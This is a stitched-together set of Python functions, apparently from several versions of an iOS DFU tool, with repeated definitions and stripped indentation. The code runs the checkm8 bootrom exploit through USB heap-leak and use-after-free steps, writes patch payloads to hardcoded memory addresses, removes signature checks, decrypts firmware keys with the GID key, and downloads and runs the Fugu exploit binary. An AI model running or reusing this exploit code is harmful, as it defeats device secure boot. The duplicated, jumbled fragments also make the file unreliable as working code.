def pwndfumode_TEST():
# os.chdir("resources/ipwndfu")
device = dfu.acquire_device()
serial_number = device.serial_number
dfu.release_device(device)
# CPID:8960' in serial_number: # my1
# runexploit = checkm8.exploit()
cmd = 'ipwndfu_geohot/ipwndfu -p'
so = subprocess.run(cmd, shell=True, stdout=subprocess.DEVNULL)
runexploit = so.returncode
if runexploit:
print("Exploit worked!")
os.chdir("../resources/ipwndfu")
removesig()
else:
print('\033[91m' + "Exploit failed =(" + '\033[0m')
exit(99)
def xsigpatch():
device = dfu.acquire_device()
serial_number = device.serial_number
dfu.release_device(device)
device = usbexec.PwnedUSBDevice()
HEAP_BASE = 0x1801E8000
HEAP_WRITE_OFFSET = 0x5000
HEAP_WRITE_HASH = 0x10000D4EC
HEAP_CHECK_ALL = 0x10000DB98
HEAP_STATE = 0x1800086A0
NAND_BOOT_JUMP = 0x10000188C
BOOTSTRAP_TASK_LR = 0x180015F88
DFU_BOOL = 0x1800085B0
DFU_NOTIFY = 0x1000098B4
DFU_STATE = 0x1800085E0
TRAMPOLINE = 0x180018000
block1 = struct.pack('<8Q', 0, 0, 0, HEAP_STATE, 2, 132, 128, 0)
block2 = struct.pack('<8Q', 0, 0, 0, HEAP_STATE, 2, 8, 128, 0)
device = usbexec.PwnedUSBDevice()
device.write_memory(HEAP_BASE + HEAP_WRITE_OFFSET, block1)
device.write_memory(HEAP_BASE + HEAP_WRITE_OFFSET + 0x80, block2)
device.write_memory(HEAP_BASE + HEAP_WRITE_OFFSET + 0x100, block2)
device.write_memory(HEAP_BASE + HEAP_WRITE_OFFSET + 0x180, block2)
device.execute(0, HEAP_WRITE_HASH, HEAP_BASE + HEAP_WRITE_OFFSET)
device.execute(0, HEAP_WRITE_HASH, HEAP_BASE + HEAP_WRITE_OFFSET + 0x80)
device.execute(0, HEAP_WRITE_HASH, HEAP_BASE + HEAP_WRITE_OFFSET + 0x100)
device.execute(0, HEAP_WRITE_HASH, HEAP_BASE + HEAP_WRITE_OFFSET + 0x180)
device.execute(0, HEAP_CHECK_ALL)
print('Heap repaired.')
device.write_memory(TRAMPOLINE + 0x400, open('bin/0x8015.bin').read())
device.execute(0, 0x180018400)
print('Bootrom Patched')
def __init__(self):
self.config = None
self.platform = None
device = dfu.acquire_device()
self.serial_number = device.serial_number
dfu.release_device(device)
for dp in device_platform.all_platforms:
if self.serial_number.startswith('CPID:%04x CPRV:%02x ' %
(dp.cpid, dp.cprv)):
self.platform = dp
break
if self.platform is None:
print(self.serial_number)
print('ERROR: No matching usbexec.platform found for this device.')
sys.exit(1)
info = self.read_memory(self.image_base() + 0x200, 0x100)
for config in configs:
if config.match(info):
self.config = config
break
if self.config is None:
print(info)
print('ERROR: No matching usbexec.config found for this image.')
sys.exit(1)
def pwndfumode():
os.chdir("resources/ipwndfu")
device = dfu.acquire_device()
serial_number = device.serial_number
dfu.release_device(device)
removesig()
def getecid():
device = dfu.acquire_device()
serial = device.serial_number
with silence_stdout():
print(serial)
try:
found = re.search('ECID:(.+?) IBFL', serial).group(1)
#print("Your ECID is :", found)
return found
except AttributeError:
print('\033[91m' + "ERROR: Couldn't find ECID in serial" + '\033[0m')
def decryptKBAG(kbag: str):
device = dfu.acquire_device()
serial_number = device.serial_number
dfu.release_device(device)
if "CPID:8960" in serial_number or "CPID:8965" in serial_number or "CPID:8010" in serial_number or "CPID:8015" in serial_number:
cmd = f'resources/ipwndfuX/ipwndfu --decrypt-gid={kbag}' # Tried to port the function to python3 but was far to difficult for some reason
elif "CPID:8000" in serial_number or "CPID:8003" in serial_number or "CPID:7000" in serial_number or "CPID:7001" in serial_number:
cmd = f'resources/ipwndfuKeys/ipwndfu --decrypt-gid={kbag}' # Tried to port the function to python3 but was far to difficult for some reason
else:
print("Not supported...")
exit(0)
ivkey = os.popen(cmd).read()
ivkey = re.sub(r'Decrypting with \w+ GID key\.', '', ivkey)
ivkey = ivkey[1:-1]
return ivkey
def pwndfumode():
os.chdir("resources/ipwndfu")
device = dfu.acquire_device()
serial_number = device.serial_number
dfu.release_device(device)
if 'CPID:8960' in serial_number:
runexploit = checkm8.exploit()
if runexploit:
print("Exploit worked!")
removesig()
else:
print('\033[91m' + "Exploit failed =(" + '\033[0m')
exit(99)
elif 'CPID:8965' in serial_number:
runexploit = checkm8.exploit()
if runexploit:
print("Exploit worked!")
removesig()
else:
print('\033[91m' + "Exploit failed =(" + '\033[0m')
exit(99)
elif 'CPID:8950' in serial_number:
print("iPhone 5 found!")
os.chdir("..")
print(
'\033[91m' +
"You need to have your 32 Bit device in normal mode, not DFU. Restart it and try again"
+ '\033[0m')
exit(2)
else:
print('Found:', serial_number)
print('\033[91m' + 'ERROR: This device is not supported.' + '\033[0m')
exit(1)
def command(self, request_data, response_length):
assert 0 <= response_length <= USB_READ_LIMIT
device = dfu.acquire_device()
assert self.serial_number == device.serial_number
dfu.send_data(device, b'\0' * 16)
device.ctrl_transfer(0x21, 1, 0, 0, 0, 100)
device.ctrl_transfer(0xA1, 3, 0, 0, 6, 100)
device.ctrl_transfer(0xA1, 3, 0, 0, 6, 100)
dfu.send_data(device, request_data)
# HACK
if response_length == 0:
response = device.ctrl_transfer(0xA1, 2, 0xFFFF, 0,
response_length + 1,
CMD_TIMEOUT).tostring()[1:]
else:
response = device.ctrl_transfer(0xA1, 2, 0xFFFF, 0,
response_length,
CMD_TIMEOUT).tostring()
dfu.release_device(device)
assert len(response) == response_length
return response
def pwndfumodeKeys():
device = dfu.acquire_device()
serial_number = device.serial_number
dfu.release_device(device)
if "CPID:8960" in serial_number:
if not os.path.exists("checkm8.py"):
os.chdir("resources/ipwndfu")
runexploit = checkm8.exploit()
if runexploit:
os.chdir("../..")
else:
print("Exploit failed, reboot device into DFU mode and press enter to re-run checkm8")
input()
pwndfumodeKeys ()
elif "CPID:8965" in serial_number:
if not os.path.exists("checkm8.py"):
os.chdir("resources/ipwndfu")
runexploit = checkm8.exploit()
if runexploit:
print("Exploit worked!")
os.chdir("../..")
else:
print("Exploit failed, reboot device into DFU mode and press enter to re-run checkm8")
input()
pwndfumodeKeys()
elif "CPID:8010" in serial_number:
if "PWND:[checkm8]" in serial_number:
print("Device already in PWNDFU mode, not re-running exploit..")
return
else:
if not os.path.exists("checkm8.py"):
os.chdir("resources/ipwndfu8010")
cmd = './ipwndfu -p'
so = os.popen(cmd).read()
print(so)
if "ERROR: No Apple device" in so:
print("Exploit failed, reboot device into DFU mode and press enter to re-run checkm8")
input()
pwndfumodeKeys()
time.sleep(5)
device = dfu.acquire_device()
serial_number = device.serial_number
dfu.release_device(device)
if "PWND:[checkm8]" in serial_number:
print("Exploit worked!")
os.chdir("../..")
time.sleep(5)
return
elif "CPID:8015" in serial_number:
if "PWND:[checkm8]" in serial_number:
print("Device already in PWNDFU mode, not re-running exploit..")
return
else:
if not os.path.exists("checkm8.py"):
os.chdir("resources/ipwndfuX")
cmd = './ipwndfu -p'
so = os.popen(cmd).read()
print(so)
if "ERROR: No Apple device" in so:
print("Exploit failed, reboot device into DFU mode and press enter to re-run checkm8")
input()
pwndfumodeKeys()
os.chdir("../..")
time.sleep(5)
# Need to re-acquire the device before we check if checkm8 worked or it will always report as failed
device = dfu.acquire_device()
serial_number = device.serial_number
dfu.release_device(device)
if "PWND:[checkm8]" in serial_number:
print("Exploit worked!")
return
else:
print("Exploit failed...\nReboot and try again...")
exit(2)
elif "CPID:8000" in serial_number or "CPID:8003" in serial_number or "CPID:7000" in serial_number or "CPID:7001" in serial_number:
if "PWND:[checkm8]" in serial_number:
print("Device already in PWNDFU mode, not re-running exploit..")
return
else:
if not os.path.exists("checkm8.py"):
os.chdir("resources/ipwndfuKeys")
cmd = './ipwndfu -p'
so = os.popen(cmd).read()
print(so)
if "ERROR: No Apple device" in so:
print("Exploit failed, reboot device into DFU mode and press enter to re-run checkm8")
input()
pwndfumodeKeys()
os.chdir("../..")
time.sleep(5)
# Need to re-acquire the device before we check if checkm8 worked or it will always report as failed
device = dfu.acquire_device()
serial_number = device.serial_number
dfu.release_device(device)
if "PWND:[checkm8]" in serial_number:
print("Exploit worked!")
return
else:
print("Exploit failed...\nReboot and try again...")
exit(2)
return
else:
print("Please open an issue and let me know what device you are using/it's CPID and I will add support ASAP")
exit(2)
def pwndfumode():
device = dfu.acquire_device()
serial_number = device.serial_number
dfu.release_device(device)
if "CPID:8960" in serial_number:
if not os.path.exists("pwnedDFU"):
os.chdir("resources/bin")
cmd = './pwnedDFU -p -f'
so = os.popen(cmd).read()
if "Device is now in pwned DFU mode!" in so:
print("Exploit worked!")
os.chdir("../..")
return
else:
print("Exploit failed, reboot device into DFU mode and press enter to re-run checkm8")
input()
os.chdir("../..")
pwndfumode()
elif "CPID:8965" in serial_number:
if not os.path.exists("checkm8.py"):
os.chdir("resources/ipwndfu")
runexploit = checkm8.exploit()
if runexploit:
print("Exploit worked!")
cmd = 'python2.7 rmsigchks.py'
so = os.popen(cmd).read()
print(so)
os.chdir("../..")
else:
print("Exploit failed, reboot device into DFU mode and press enter to re-run checkm8")
input()
pwndfumode()
elif "CPID:8010" in serial_number:
# I don't want to bundle Fugu just to make sure that people know it hasnt been modified
# I'd rather just quickly download the binary from Linus's github if it hasnt been already to avoid any issues
if os.path.exists("resources/Fugu_8010/Fugu"):
pass
else:
os.mkdir("resources/Fugu_8010")
print("Downloading latest Fugu release from LinusHenze's github...")
if os.path.exists("fugu.zip"):
os.remove("fugu.zip")
url = "https://github.com/LinusHenze/Fugu/releases/download/v0.4/Fugu_v0.4.zip"
r = requests.get(url, allow_redirects=True)
open('fugu.zip', 'wb').write(r.content)
if os.path.exists("fugu"):
shutil.rmtree("fugu")
os.mkdir("fugu")
else:
os.mkdir("fugu")
shutil.move("fugu.zip", "fugu/fugu.zip")
os.chdir("fugu")
with ZipFile('fugu.zip', 'r') as zipObj:
zipObj.extractall()
os.chdir("../")
shutil.move("fugu/fugu", "resources/Fugu_8010/Fugu")
shutil.move("fugu/shellcode", "resources/Fugu_8010/shellcode")
st = os.stat('resources/Fugu_8010/Fugu')
os.chmod('resources/Fugu_8010/Fugu', st.st_mode | stat.S_IEXEC)
shutil.rmtree("fugu")
print("Fugu has now been installed!")
if "PWND:[checkm8]" in serial_number:
print("Device already in PWNDFU mode, not re-running exploit..")
return
else:
if not os.path.exists("Fugu"):
os.chdir("resources/Fugu_8010")
cmd = './Fugu rmsigchks'
so = os.popen(cmd).read()
#print(so)
if "Exploiting iDevice: FAILED!" in so:
print("Exploit failed, however re-expoilting without rebooting might work. Attempting now...")
pwndfumode()
if "Device could not be found!" in so:
print("Exploit failed, reboot device into DFU mode and press enter to re-run checkm8")
input()
pwndfumode()
time.sleep(5)
device = dfu.acquire_device()
serial_number = device.serial_number
dfu.release_device(device)
if "PWND:[checkm8]" in serial_number:
print("Exploit worked!")
os.chdir("../..")
time.sleep(5)
return
elif "CPID:8015" in serial_number:
if "PWND:[checkm8]" in serial_number:
print("Device already in PWNDFU mode, not re-running exploit..")
return
else:
if not os.path.exists("checkm8.py"):
os.chdir("resources/ipwndfuX")
cmd = './ipwndfu -p'
so = os.popen(cmd).read()
print(so)
if "ERROR: No Apple device" in so:
print("Exploit failed, reboot device into DFU mode and press enter to re-run checkm8")
input()
pwndfumode()
cmd = './ipwndfu --patch'
so = os.popen(cmd).read()
print(so)
os.chdir("../..")
time.sleep(5)
# Need to re-acquire the device before we check if checkm8 worked or it will always report as failed
device = dfu.acquire_device()
serial_number = device.serial_number
dfu.release_device(device)
if "PWND:[checkm8]" in serial_number:
print("Exploit worked!")
return
else:
print("Exploit failed...\nReboot and try again...")
exit(2)
elif "CPID:8000" in serial_number:
cmd = './resources/bin/eclipsa8000'
so = os.popen(cmd).read()
print(so)
print("Eclipsa doesn't allow me to see if the exploit worked or not =(\nJust have to assume it did, if it didn't then reboot into DFU mode and re-run PyBoot")
return
elif "CPID:8003" in serial_number:
cmd = './resources/bin/eclipsa8003'
so = os.popen(cmd).read()
print(so)
print("Eclipsa doesn't allow me to see if the exploit worked or not =(\nJust have to assume it did, if it didn't then reboot into DFU mode and re-run PyBoot")
return
elif "CPID:7000" in serial_number:
cmd = './resources/bin/eclipsa7000'
so = os.popen(cmd).read()
print(so)
print("Eclipsa doesn't allow me to see if the exploit worked or not =(\nJust have to assume it did, if it didn't then reboot into DFU mode and re-run PyBoot")
return
elif "CPID:7001" in serial_number:
cmd = './resources/bin/eclipsa8000'
so = os.popen(cmd).read()
print(so)
print("Eclipsa doesn't allow me to see if the exploit worked or not =(\nJust have to assume it did, if it didn't then reboot into DFU mode and re-run PyBoot")
return
else:
print("Please open an issue and let me know what device you are using/it's CPID and I will add support ASAP")
exit(2)
def pwndfumode():
device = dfu.acquire_device()
serial_number = device.serial_number
dfu.release_device(device)
if "CPID:8960" in serial_number:
if not os.path.exists("checkm8.py"):
os.chdir("resources/ipwndfu")
runexploit = checkm8.exploit()
if runexploit:
print("Exploit worked!")
cmd = 'python2.7 rmsigchks.py'
so = os.popen(cmd).read()
print(so)
os.chdir("../..")
else:
print(
"Exploit failed, reboot device into DFU mode and press enter to re-run checkm8"
)
input()
pwndfumode()
elif "CPID:8965" in serial_number:
if not os.path.exists("checkm8.py"):
os.chdir("resources/ipwndfu")
runexploit = checkm8.exploit()
if runexploit:
print("Exploit worked!")
cmd = 'python2.7 rmsigchks.py'
so = os.popen(cmd).read()
print(so)
os.chdir("../..")
else:
print(
"Exploit failed, reboot device into DFU mode and press enter to re-run checkm8"
)
input()
pwndfumode()
elif "CPID:8010" in serial_number:
if "PWND:[checkm8]" in serial_number:
print("Device already in PWNDFU mode, not re-running exploit..")
return
else:
if not os.path.exists("checkm8.py"):
os.chdir("resources/ipwndfu8010")
cmd = './ipwndfu -p'
so = os.popen(cmd).read()
print(so)
if "ERROR: No Apple device" in so:
print(
"Exploit failed, reboot device into DFU mode and press enter to re-run checkm8"
)
input()
pwndfumode()
time.sleep(5)
device = dfu.acquire_device()
serial_number = device.serial_number
dfu.release_device(device)
if "PWND:[checkm8]" in serial_number:
print("Exploit worked!")
cmd = 'python2.7 rmsigchks.py'
so = subprocess.Popen(cmd, shell=True)
print(so)
os.chdir("../..")
time.sleep(5)
return
elif "CPID:8015" in serial_number:
if "PWND:[checkm8]" in serial_number:
print("Device already in PWNDFU mode, not re-running exploit..")
return
else:
if not os.path.exists("checkm8.py"):
os.chdir("resources/ipwndfuX")
cmd = './ipwndfu -p'
so = os.popen(cmd).read()
print(so)
if "ERROR: No Apple device" in so:
print(
"Exploit failed, reboot device into DFU mode and press enter to re-run checkm8"
)
input()
pwndfumode()
cmd = './ipwndfu --patch'
so = os.popen(cmd).read()
print(so)
os.chdir("../..")
time.sleep(5)
# Need to re-acquire the device before we check if checkm8 worked or it will always report as failed
device = dfu.acquire_device()
serial_number = device.serial_number
dfu.release_device(device)
if "PWND:[checkm8]" in serial_number:
print("Exploit worked!")
return
else:
print("Exploit failed...\nReboot and try again...")
exit(2)
elif "CPID:8000" in serial_number:
cmd = './resources/bin/eclipsa8000'
so = os.popen(cmd).read()
print(so)
print(
"Eclipsa doesn't allow me to see if the exploit worked or not =(\nJust have to assume it did, if it didn't then reboot into DFU mode and re-run PyBoot"
)
return
elif "CPID:8003" in serial_number:
cmd = './resources/bin/eclipsa8003'
so = os.popen(cmd).read()
print(so)
print(
"Eclipsa doesn't allow me to see if the exploit worked or not =(\nJust have to assume it did, if it didn't then reboot into DFU mode and re-run PyBoot"
)
return
elif "CPID:7000" in serial_number:
cmd = './resources/bin/eclipsa7000'
so = os.popen(cmd).read()
print(so)
print(
"Eclipsa doesn't allow me to see if the exploit worked or not =(\nJust have to assume it did, if it didn't then reboot into DFU mode and re-run PyBoot"
)
return
elif "CPID:7001" in serial_number:
cmd = './resources/bin/eclipsa8000'
so = os.popen(cmd).read()
print(so)
print(
"Eclipsa doesn't allow me to see if the exploit worked or not =(\nJust have to assume it did, if it didn't then reboot into DFU mode and re-run PyBoot"
)
return
else:
print(
"Please open an issue and let me know what device you are using/it's CPID and I will add support ASAP"
)
exit(2)
def exploit():
#print('*** checkm8 exploit by axi0mX ***')
#print('*** modified version by Linus Henze ***')
#print('*** s5l8965x support by Matthew Pierson ***')
device = dfu.acquire_device()
start = time.time()
print('Found:', device.serial_number)
if 'PWND:[' in device.serial_number:
print('Device is already in pwned DFU Mode. Not executing exploit.')
return True
payload, config = exploit_config(device.serial_number)
if config.large_leak is not None:
usb_req_stall(device)
for i in range(config.large_leak):
usb_req_leak(device)
usb_req_no_leak(device)
else:
stall(device)
for i in range(config.hole):
no_leak(device)
leak(device)
no_leak(device)
dfu.usb_reset(device)
dfu.release_device(device)
device = dfu.acquire_device()
device.serial_number
libusb1_async_ctrl_transfer(device, 0x21, 1, 0, 0, b'A' * 0x800, 0.0001)
# Advance buffer offset before triggering the UaF to prevent trashing the heap
libusb1_no_error_ctrl_transfer(device, 0, 0, 0, 0,
'A' * config.overwrite_offset, 10)
libusb1_no_error_ctrl_transfer(device, 0x21, 4, 0, 0, 0, 0)
dfu.release_device(device)
time.sleep(0.5)
device = dfu.acquire_device()
usb_req_stall(device)
if config.large_leak is not None:
usb_req_leak(device)
else:
for i in range(config.leak):
usb_req_leak(device)
libusb1_no_error_ctrl_transfer(device, 0, 0, 0, 0, config.overwrite, 50)
for i in range(0, len(payload), 0x800):
libusb1_no_error_ctrl_transfer(device, 0x21, 1, 0, 0,
payload[i:i + 0x800], 50)
dfu.usb_reset(device)
dfu.release_device(device)
device = dfu.acquire_device()
if 'PWND:[checkm8]' not in device.serial_number:
print('ERROR: Exploit failed. Device did not enter pwned DFU Mode.')
sys.exit(1)
print('Device is now in pwned DFU Mode.')
print('(%0.2f seconds)' % (time.time() - start))
dfu.release_device(device)
return True
